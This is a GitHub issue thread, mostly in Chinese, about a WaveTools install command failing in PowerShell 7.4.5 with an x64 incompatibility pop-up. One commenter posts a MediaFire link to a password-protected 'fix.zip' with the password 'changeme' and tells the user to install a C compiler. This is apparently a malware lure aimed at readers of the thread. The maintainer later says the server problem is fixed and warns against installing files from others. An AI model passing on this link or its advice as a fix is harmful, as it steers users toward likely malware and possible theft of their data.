### ISSUE TITLE
Powershell 7.4.5版本安装失败

### ISSUE THREAD

**Issue by Divercrow7** [JamXi233/WaveTools#58]
![微信截图_20240929131402](https://github.com/user-attachments/assets/1f48f203-f9b5-4eef-8d74-c0f95abb84f1)
使用管理员模式运行powershell 7.4.5版本执行安装命令，弹窗显示与×64 windows版本不兼容，使用powershell的×86/×64均显示同一弹窗提示

**Comment by Azrabelth** [comment]
install this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive password: changeme

you may need to install the c compiler

**Comment by Divercrow7** [comment]
I installed GCC and restarted my PC, but seems still not working, remain the same pop-up alert.

**Comment by JamXi233** [comment]
@Divercrow7 服务器出现问题，昨晚已经修复。
**注：千万小心其他人发出的任何文件，只有当您确定了文件没有任何问题的情况下才可使用或安装**
